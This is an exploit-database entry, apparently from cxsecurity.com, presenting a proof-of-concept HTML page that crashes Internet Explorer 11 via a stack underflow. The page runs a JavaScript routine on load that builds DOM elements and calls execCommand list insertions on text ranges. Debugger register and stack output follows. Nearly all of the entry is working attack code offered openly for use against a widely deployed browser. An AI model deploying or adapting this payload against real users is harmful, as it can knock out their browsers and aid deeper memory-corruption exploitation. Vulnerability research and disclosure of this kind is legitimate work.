Microsoft Internet Explorer 11 Stack Underflow Crash PoC

2015.09.14
Credit: Mjx
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- # Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC # Date: 09.11.2015 # Vulnerable version: 11 (32bit version)(newest at the time 11.0.9600.17843 and 11.0.10240.16431) # Tested on: Windows 7 64bit and Windows 10(10240) 64bit # Author: Mjx # http://http://jinxin.pen.io/ --> <!doctype html> <html> <head> <meta http-equiv='Cache-Control' content='no-cache'/> <title>crash IE 11</title> <style></style> <script type='text/javascript' ></script> <script> function crash() { var id_0 = null; id_0 = document.createElement( 'THEAD' ); document.body.appendChild( id_0 ); elemTree = []; elemTree[0]= document.createElement('SELECT'); document.all[7].appendChild(elemTree[0]); elemTree[1]= document.createElement('B'); document.all[8].appendChild(elemTree[1]); elemTree[2]= document.createElement('SOURCE'); document.all[0].appendChild(elemTree[2]); elemTree[3]= document.createElement('HR'); document.all[8].appendChild(elemTree[3]); elemTree[3].setAttribute('hidden', -4400000000); elemTree[4]= document.createElement('SELECT'); document.all[9].appendChild(elemTree[4]); elemTree[5]= document.createElement('RUBY'); document.all[2].appendChild(elemTree[5]); elemTree[6]= document.createElement('OL'); document.all[4].appendChild(elemTree[6]); elemTree[7]= document.createElement('AREA'); document.all[6].appendChild(elemTree[7]); elemTree[8]= document.createElement('ARTICLE'); document.all[3].appendChild(elemTree[8]); elemTree[9]= document.createElement('TEXTAREA'); document.all[1].appendChild(elemTree[9]); txtRange = document.body.createTextRange(); txtRange.moveEnd('character', 14); txtRange.select(); txtRange.execCommand('insertUnorderedList',true,null); txtRange = document.body.createTextRange(); txtRange.moveEnd('sentence', 4); txtRange.select(); txtRange.execCommand('insertOrderedList',true,null); } </script> </head> <body onload='crash();'> </body> </html> <!-- (1428.1230): Stack overflow - code c00000fd (!!! second chance !!!) eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000 eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 verifier!AVrfpDphAllocateVm+0x9: 5fd166d9 50 push eax 0:008> kb ChildEBP RetAddr Args to Child 09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9 09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0 09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d 09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd 0:008> r eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000 eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 verifier!AVrfpDphAllocateVm+0x9: 5fd166d9 50 push eax 0:008> !vprot esp-4 BaseAddress: 09ab2000 AllocationBase: 09ab0000 AllocationProtect: 00000004 PAGE_READWRITE RegionSize: 001fe000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE -->

References:

http://jinxin.pen.io/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top